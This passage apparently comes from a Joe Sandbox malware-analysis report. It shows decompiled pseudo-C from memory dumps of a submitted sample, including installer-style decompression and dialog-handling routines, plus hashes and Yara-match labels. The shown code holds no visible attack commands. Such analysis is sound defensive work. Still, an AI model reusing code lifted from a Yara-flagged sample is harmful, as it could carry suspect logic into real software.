                                                  										_v36 =  &(_v36[1]);
                                                  										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                  										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                  									} else {
                                                  										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                  										_t208 =  *_t284;
                                                  										_v36 =  &(_t284[1]);
                                                  									}
                                                  									_a6 = _t208;
                                                  								} else {
                                                  									_a4 = 0xc0;
                                                  								}
                                                  								_t286 = 1 << _v8 - _t186;
                                                  								_t244 = _v12 >> _t186;
                                                  								while(_t244 < _v40) {
                                                  									 *(_t168 + _t244 * 4) = _a4;
                                                  									_t244 = _t244 + _t286;
                                                  								}
                                                  								_t287 = _v12;
                                                  								_t246 = 1 << _v44;
                                                  								while((_t287 & _t246) != 0) {
                                                  									_t287 = _t287 ^ _t246;
                                                  									_t246 = _t246 >> 1;
                                                  								}
                                                  								_t288 = _t287 ^ _t246;
                                                  								_v20 = 1;
                                                  								_v12 = _t288;
                                                  								_t251 = _v16;
                                                  								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                  									L60:
                                                  									if(_v48 != 0) {
                                                  										_t282 = _v48;
                                                  										_t283 = _t282 - 1;
                                                  										_t200 = _a28 + _t186;
                                                  										_v48 = _t283;
                                                  										_v24 = _t200;
                                                  										if(_v8 <= _t200) {
                                                  											goto L45;
                                                  										}
                                                  										goto L31;
                                                  									}
                                                  									break;
                                                  								} else {
                                                  									goto L58;
                                                  								}
                                                  								do {
                                                  									L58:
                                                  									_t186 = _t186 - _a28;
                                                  									_t251 = _t251 - 1;
                                                  								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                  								_v16 = _t251;
                                                  								goto L60;
                                                  							}
                                                  							L61:
                                                  							_v8 = _v8 + 1;
                                                  							_v32 = _v32 + 4;
                                                  							_v44 = _v44 + 1;
                                                  						} while (_v8 <= _v28);
                                                  						goto L62;
                                                  					}
                                                  					_t277 = 0;
                                                  					do {
                                                  						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                  						_t277 = _t277 + 4;
                                                  						_t235 = _t235 - 1;
                                                  						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                  					} while (_t235 != 0);
                                                  					goto L21;
                                                  				}
                                                  				 *_a24 =  *_a24 & 0x00000000;
                                                  				 *_a28 =  *_a28 & 0x00000000;
                                                  				return 0;
                                                  			}











































































                                                  0x00407567
                                                  0x0040756f
                                                  0x00407573
                                                  0x00407575
                                                  0x00407578
                                                  0x0040757a
                                                  0x0040757a
                                                  0x0040757c
                                                  0x00407583
                                                  0x00407585
                                                  0x00407585
                                                  0x0040758b
                                                  0x004075a0
                                                  0x004075a8
                                                  0x004075aa
                                                  0x004075ac
                                                  0x004075af
                                                  0x004075b0
                                                  0x004075b0
                                                  0x004075b6
                                                  0x00000000
                                                  0x00000000
                                                  0x004075b8
                                                  0x004075bb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004075bb
                                                  0x004075bf
                                                  0x004075c2
                                                  0x004075c4
                                                  0x004075c4
                                                  0x004075c7
                                                  0x004075cd
                                                  0x004075ce
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004075ce
                                                  0x004075d3
                                                  0x004075d6
                                                  0x004075d8
                                                  0x004075d8
                                                  0x004075de
                                                  0x004075e0
                                                  0x004075f1
                                                  0x004075e4
                                                  0x004075e8
                                                  0x0040788d
                                                  0x00000000
                                                  0x0040788d
                                                  0x004075ee
                                                  0x004075ef
                                                  0x004075ef
                                                  0x004075f7
                                                  0x004075fa
                                                  0x004075fe
                                                  0x00407600
                                                  0x00407602
                                                  0x00407605
                                                  0x00000000
                                                  0x00000000
                                                  0x0040760d
                                                  0x00407613
                                                  0x00407615
                                                  0x00407617
                                                  0x00407618
                                                  0x0040762d
                                                  0x0040762d
                                                  0x00407630
                                                  0x00407632
                                                  0x00407632
                                                  0x00407634
                                                  0x00407639
                                                  0x0040763b
                                                  0x00407642
                                                  0x00407644
                                                  0x0040764c
                                                  0x0040764c
                                                  0x0040764e
                                                  0x0040764f
                                                  0x0040765e
                                                  0x00407662
                                                  0x00407666
                                                  0x00407669
                                                  0x0040766c
                                                  0x00407671
                                                  0x00407674
                                                  0x0040767a
                                                  0x00407681
                                                  0x00407687
                                                  0x00407880
                                                  0x00407880
                                                  0x00407885
                                                  0x00407894
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407885
                                                  0x00407694
                                                  0x00407697
                                                  0x0040769a
                                                  0x0040769d
                                                  0x004076a1
                                                  0x00000000
                                                  0x00000000
                                                  0x004076ac
                                                  0x004076af
                                                  0x004076b0
                                                  0x004076b2
                                                  0x004076b8
                                                  0x004076bb
                                                  0x00000000
                                                  0x00000000
                                                  0x004076c1
                                                  0x004076c2
                                                  0x004076c5
                                                  0x004076c8
                                                  0x004076cb
                                                  0x004076d1
                                                  0x004076d3
                                                  0x004076d3
                                                  0x004076db
                                                  0x004076df
                                                  0x004076e4
                                                  0x00407709
                                                  0x0040770f
                                                  0x00407711
                                                  0x00407713
                                                  0x00407716
                                                  0x0040771f
                                                  0x00000000
                                                  0x00000000
                                                  0x004076e6
                                                  0x004076e6
                                                  0x004076ef
                                                  0x004076f3
                                                  0x00000000
                                                  0x00000000
                                                  0x00407704
                                                  0x00407704
                                                  0x00407707
                                                  0x00000000
                                                  0x00000000
                                                  0x004076f7
                                                  0x004076fa
                                                  0x004076fc
                                                  0x00407700
                                                  0x00000000
                                                  0x00000000
                                                  0x00407702
                                                  0x00407702
                                                  0x00000000
                                                  0x00407704
                                                  0x00407728
                                                  0x0040772e
                                                  0x00407738
                                                  0x0040773a
                                                  0x0040773f
                                                  0x00407741
                                                  0x00407777
                                                  0x00407743
                                                  0x00407743
                                                  0x00407746
                                                  0x00407749
                                                  0x00407753
                                                  0x00407756
                                                  0x0040775d
                                                  0x00407768
                                                  0x0040776f
                                                  0x0040776f
                                                  0x00407779
                                                  0x0040777c
                                                  0x0040777e
                                                  0x00407784
                                                  0x00407784
                                                  0x0040778d
                                                  0x00407790
                                                  0x00407795
                                                  0x004077a4
                                                  0x004077ac
                                                  0x004077b1
                                                  0x004077d5
                                                  0x004077dd
                                                  0x004077e1
                                                  0x004077e7
                                                  0x004077b3
                                                  0x004077c1
                                                  0x004077c4
                                                  0x004077ca
                                                  0x004077ca
                                                  0x004077eb
                                                  0x004077a6
                                                  0x004077a6
                                                  0x004077a6
                                                  0x004077fc
                                                  0x00407800
                                                  0x0040780c
                                                  0x00407807
                                                  0x0040780a
                                                  0x0040780a
                                                  0x00407814
                                                  0x00407819
                                                  0x00407821
                                                  0x0040781d
                                                  0x0040781f
                                                  0x0040781f
                                                  0x00407827
                                                  0x00407829
                                                  0x00407830
                                                  0x0040783a
                                                  0x00407844
                                                  0x00407860
                                                  0x00407864
                                                  0x004076a9
                                                  0x004076af
                                                  0x004076b0
                                                  0x004076b2
                                                  0x004076b8
                                                  0x004076bb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004076bb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407846
                                                  0x00407846
                                                  0x00407846
                                                  0x0040784b
                                                  0x00407854
                                                  0x0040785d
                                                  0x00000000
                                                  0x0040785d
                                                  0x0040786a
                                                  0x0040786a
                                                  0x0040786d
                                                  0x00407874
                                                  0x00407877
                                                  0x00000000
                                                  0x0040769a
                                                  0x0040761a
                                                  0x0040761c
                                                  0x0040761c
                                                  0x00407620
                                                  0x00407623
                                                  0x00407624
                                                  0x00407624
                                                  0x00000000
                                                  0x0040761c
                                                  0x00407590
                                                  0x00407596
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                  • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                  • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                  • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e8f1e5c10d567a146eac3befaed40d91b3358aa03453bf8e8bba8df58672655
                                                  • Instruction ID: 2c8329f63c7c84f005932f9fbd5a039c5b8cb20bcf6d789e51fa8e4324178543
                                                  • Opcode Fuzzy Hash: 9e8f1e5c10d567a146eac3befaed40d91b3358aa03453bf8e8bba8df58672655
                                                  • Instruction Fuzzy Hash: B44178725007949BDB30CF2AC9D8BDB77E3AF98384F95061A8D4D8B600C732AA418F16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e381175a31ddc42cadb7dd0d7650bd72de616b90f9123d8dfd5532ef6d1eb5be
                                                  • Instruction ID: 165fbfca006667942c378b25c9123f58583301d2edfab7378707c3e75150a437
                                                  • Opcode Fuzzy Hash: e381175a31ddc42cadb7dd0d7650bd72de616b90f9123d8dfd5532ef6d1eb5be
                                                  • Instruction Fuzzy Hash: FF410270A087958BDF71CF78C8D4BCA7BA5AF46324F4882ADDC998B287DB704442CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d3185ec23da6385a46639960b0475a8eead1425c1086c3fee4de75934e9b866
                                                  • Instruction ID: c985989eebc765afda0917e7e40b9880fa837b19a42fbfd1731fddf57d32d6b0
                                                  • Opcode Fuzzy Hash: 4d3185ec23da6385a46639960b0475a8eead1425c1086c3fee4de75934e9b866
                                                  • Instruction Fuzzy Hash: 45316AB4A083489FD769CF79C8842DBBBE2EF86200F60851DDDD98B269D6318507DF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e8b1a5ecb070331f6233eb960b526e390e9a8308daae32e2e934fca2ebf754a8
                                                  • Instruction ID: cd6e08eadfe4b9dc8c84e20cd7430e46cfbe8daeb0a466443ff53b9d5b221edc
                                                  • Opcode Fuzzy Hash: e8b1a5ecb070331f6233eb960b526e390e9a8308daae32e2e934fca2ebf754a8
                                                  • Instruction Fuzzy Hash: 2B2155B9A043899FE764DF758CC42DBBBE2AF81200F61591CCDE98B21AD73186439F41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dc00690f72794b724ac12dbd6da9ef1856509da5420c938f8a55dcbc1148162e
                                                  • Instruction ID: 9255b13b2e3bce43804be17d6aa868b63392bc7052b2364d0df44cb33d4e3f8b
                                                  • Opcode Fuzzy Hash: dc00690f72794b724ac12dbd6da9ef1856509da5420c938f8a55dcbc1148162e
                                                  • Instruction Fuzzy Hash: FE110275600BA48FCB38CF19D8C4BEA73B6BF59B10F84846AD8188B256DB30DA50CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8c3283c70f22bfd0ef2a60e1f734469ab085d0069b5dd443cceb28a9210722bb
                                                  • Instruction ID: a2b4533d3342856d48aa75fc06ddc77f66a75e20e9326202217eb05c90a70880
                                                  • Opcode Fuzzy Hash: 8c3283c70f22bfd0ef2a60e1f734469ab085d0069b5dd443cceb28a9210722bb
                                                  • Instruction Fuzzy Hash: ABF0A0B9655380DFC305DF10C8A9A55BFB0FB42240B2A89D9E41A8B6A3C639DC40CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                                                  • Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
                                                  • Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                                                  • Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                                                  • Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
                                                  • Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                  • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                                                  • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                  • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 96%
                                                  			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                  				struct HWND__* _v8;
                                                  				struct HWND__* _v12;
                                                  				long _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				intOrPtr _v28;
                                                  				signed char* _v32;
                                                  				int _v36;
                                                  				signed int _v44;
                                                  				int _v48;
                                                  				signed int* _v60;
                                                  				signed char* _v64;
                                                  				signed int _v68;
                                                  				long _v72;
                                                  				void* _v76;
                                                  				intOrPtr _v80;
                                                  				intOrPtr _v84;
                                                  				void* _v88;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t198;
                                                  				intOrPtr _t201;
                                                  				long _t207;
                                                  				signed int _t211;
                                                  				signed int _t222;
                                                  				void* _t225;
                                                  				void* _t226;
                                                  				int _t232;
                                                  				long _t237;
                                                  				long _t238;
                                                  				signed int _t239;
                                                  				signed int _t245;
                                                  				signed int _t247;
                                                  				signed char _t248;
                                                  				signed char _t254;
                                                  				void* _t258;
                                                  				void* _t260;
                                                  				signed char* _t278;
                                                  				signed char _t279;
                                                  				long _t284;
                                                  				struct HWND__* _t291;
                                                  				signed int* _t292;
                                                  				int _t293;
                                                  				long _t294;
                                                  				signed int _t295;
                                                  				void* _t297;
                                                  				long _t298;
                                                  				int _t299;
                                                  				signed int _t300;
                                                  				signed int _t303;
                                                  				signed int _t311;
                                                  				signed char* _t319;
                                                  				int _t324;
                                                  				void* _t326;
                                                  
                                                  				_t291 = _a4;
                                                  				_v12 = GetDlgItem(_t291, 0x3f9);
                                                  				_v8 = GetDlgItem(_t291, 0x408);
                                                  				_t326 = SendMessageW;
                                                  				_v24 =  *0x434f28;
                                                  				_v28 =  *0x434f10 + 0x94;
                                                  				if(_a8 != 0x110) {
                                                  					L23:
                                                  					if(_a8 != 0x405) {
                                                  						_t301 = _a16;
                                                  					} else {
                                                  						_a12 = 0;
                                                  						_t301 = 1;
                                                  						_a8 = 0x40f;
                                                  						_a16 = 1;
                                                  					}
                                                  					if(_a8 == 0x4e || _a8 == 0x413) {
                                                  						_v16 = _t301;
                                                  						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                  							if(( *0x434f19 & 0x00000002) != 0) {
                                                  								L41:
                                                  								if(_v16 != 0) {
                                                  									_t237 = _v16;
                                                  									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                  										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                  									}
                                                  									_t238 = _v16;
                                                  									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                  										_t301 = _v24;
                                                  										_t239 =  *(_t238 + 0x5c);
                                                  										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                  											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                  										} else {
                                                  											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                  										}
                                                  									}
                                                  								}
                                                  								goto L48;
                                                  							}
                                                  							if(_a8 == 0x413) {
                                                  								L33:
                                                  								_t301 = 0 | _a8 != 0x00000413;
                                                  								_t245 = E00404E54(_v8, _a8 != 0x413);
                                                  								_t295 = _t245;
                                                  								if(_t295 >= 0) {
                                                  									_t94 = _v24 + 8; // 0x8
                                                  									_t301 = _t245 * 0x818 + _t94;
                                                  									_t247 =  *_t301;
                                                  									if((_t247 & 0x00000010) == 0) {
                                                  										if((_t247 & 0x00000040) == 0) {
                                                  											_t248 = _t247 ^ 0x00000001;
                                                  										} else {
                                                  											_t254 = _t247 ^ 0x00000080;
                                                  											if(_t254 >= 0) {
                                                  												_t248 = _t254 & 0x000000fe;
                                                  											} else {
                                                  												_t248 = _t254 | 0x00000001;
                                                  											}
                                                  										}
                                                  										 *_t301 = _t248;
                                                  										E0040117D(_t295);
                                                  										_a12 = _t295 + 1;
                                                  										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                                                  										_a8 = 0x40f;
                                                  									}
                                                  								}
                                                  								goto L41;
                                                  							}
                                                  							_t301 = _a16;
                                                  							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                  								goto L41;
                                                  							}
                                                  							goto L33;
                                                  						} else {
                                                  							goto L48;
                                                  						}
                                                  					} else {
                                                  						L48:
                                                  						if(_a8 != 0x111) {
                                                  							L56:
                                                  							if(_a8 == 0x200) {
                                                  								SendMessageW(_v8, 0x200, 0, 0);
                                                  							}
                                                  							if(_a8 == 0x40b) {
                                                  								_t225 =  *0x42d24c;
                                                  								if(_t225 != 0) {
                                                  									ImageList_Destroy(_t225);
                                                  								}
                                                  								_t226 =  *0x42d260;
                                                  								if(_t226 != 0) {
                                                  									GlobalFree(_t226);
                                                  								}
                                                  								 *0x42d24c = 0;
                                                  								 *0x42d260 = 0;
                                                  								 *0x434f60 = 0;
                                                  							}
                                                  							if(_a8 != 0x40f) {
                                                  								L90:
                                                  								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                                                  									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                  									ShowWindow(_v8, _t324);
                                                  									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                  								}
                                                  								goto L93;
                                                  							} else {
                                                  								E004011EF(_t301, 0, 0);
                                                  								_t198 = _a12;
                                                  								if(_t198 != 0) {
                                                  									if(_t198 != 0xffffffff) {
                                                  										_t198 = _t198 - 1;
                                                  									}
                                                  									_push(_t198);
                                                  									_push(8);
                                                  									E00404ED4();
                                                  								}
                                                  								if(_a16 == 0) {
                                                  									L75:
                                                  									E004011EF(_t301, 0, 0);
                                                  									_v36 =  *0x42d260;
                                                  									_t201 =  *0x434f28;
                                                  									_v64 = 0xf030;
                                                  									_v24 = 0;
                                                  									if( *0x434f2c <= 0) {
                                                  										L86:
                                                  										if( *0x434fbe == 0x400) {
                                                  											InvalidateRect(_v8, 0, 1);
                                                  										}
                                                  										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
                                                  											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                                                  										}
                                                  										goto L90;
                                                  									}
                                                  									_t292 = _t201 + 8;
                                                  									do {
                                                  										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                  										if(_t207 != 0) {
                                                  											_t303 =  *_t292;
                                                  											_v72 = _t207;
                                                  											_v76 = 8;
                                                  											if((_t303 & 0x00000001) != 0) {
                                                  												_v76 = 9;
                                                  												_v60 =  &(_t292[4]);
                                                  												_t292[0] = _t292[0] & 0x000000fe;
                                                  											}
                                                  											if((_t303 & 0x00000040) == 0) {
                                                  												_t211 = (_t303 & 0x00000001) + 1;
                                                  												if((_t303 & 0x00000010) != 0) {
                                                  													_t211 = _t211 + 3;
                                                  												}
                                                  											} else {
                                                  												_t211 = 3;
                                                  											}
                                                  											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                  											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                  											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                  										}
                                                  										_v24 = _v24 + 1;
                                                  										_t292 =  &(_t292[0x206]);
                                                  									} while (_v24 <  *0x434f2c);
                                                  									goto L86;
                                                  								} else {
                                                  									_t293 = E004012E2( *0x42d260);
                                                  									E00401299(_t293);
                                                  									_t222 = 0;
                                                  									_t301 = 0;
                                                  									if(_t293 <= 0) {
                                                  										L74:
                                                  										SendMessageW(_v12, 0x14e, _t301, 0);
                                                  										_a16 = _t293;
                                                  										_a8 = 0x420;
                                                  										goto L75;
                                                  									} else {
                                                  										goto L71;
                                                  									}
                                                  									do {
                                                  										L71:
                                                  										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                  											_t301 = _t301 + 1;
                                                  										}
                                                  										_t222 = _t222 + 1;
                                                  									} while (_t222 < _t293);
                                                  									goto L74;
                                                  								}
                                                  							}
                                                  						}
                                                  						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                  							goto L93;
                                                  						} else {
                                                  							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                  							if(_t232 == 0xffffffff) {
                                                  								goto L93;
                                                  							}
                                                  							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                  							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                  								_t294 = 0x20;
                                                  							}
                                                  							E00401299(_t294);
                                                  							SendMessageW(_a4, 0x420, 0, _t294);
                                                  							_a12 = _a12 | 0xffffffff;
                                                  							_a16 = 0;
                                                  							_a8 = 0x40f;
                                                  							goto L56;
                                                  						}
                                                  					}
                                                  				} else {
                                                  					_v36 = 0;
                                                  					_v20 = 2;
                                                  					 *0x434f60 = _t291;
                                                  					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                                  					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                                                  					 *0x42d254 =  *0x42d254 | 0xffffffff;
                                                  					_t297 = _t258;
                                                  					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                                                  					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                  					 *0x42d24c = _t260;
                                                  					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                  					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                                                  					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                  						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                  					}
                                                  					DeleteObject(_t297);
                                                  					_t298 = 0;
                                                  					do {
                                                  						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                  						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                  							if(_t298 != 0x20) {
                                                  								_v20 = 0;
                                                  							}
                                                  							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                                                  						}
                                                  						_t298 = _t298 + 1;
                                                  					} while (_t298 < 0x21);
                                                  					_t299 = _a16;
                                                  					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                  					_push(0x15);
                                                  					E00404499(_a4);
                                                  					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                  					_push(0x16);
                                                  					E00404499(_a4);
                                                  					_t300 = 0;
                                                  					_v16 = 0;
                                                  					if( *0x434f2c <= 0) {
                                                  						L19:
                                                  						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                  						goto L20;
                                                  					} else {
                                                  						_t319 = _v24 + 8;
                                                  						_v32 = _t319;
                                                  						do {
                                                  							_t278 =  &(_t319[0x10]);
                                                  							if( *_t278 != 0) {
                                                  								_v64 = _t278;
                                                  								_t279 =  *_t319;
                                                  								_v88 = _v16;
                                                  								_t311 = 0x20;
                                                  								_v84 = 0xffff0002;
                                                  								_v80 = 0xd;
                                                  								_v68 = _t311;
                                                  								_v44 = _t300;
                                                  								_v72 = _t279 & _t311;
                                                  								if((_t279 & 0x00000002) == 0) {
                                                  									if((_t279 & 0x00000004) == 0) {
                                                  										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                  									} else {
                                                  										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                  									}
                                                  								} else {
                                                  									_v80 = 0x4d;
                                                  									_v48 = 1;
                                                  									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                  									_v36 = 1;
                                                  									 *( *0x42d260 + _t300 * 4) = _t284;
                                                  									_v16 =  *( *0x42d260 + _t300 * 4);
                                                  								}
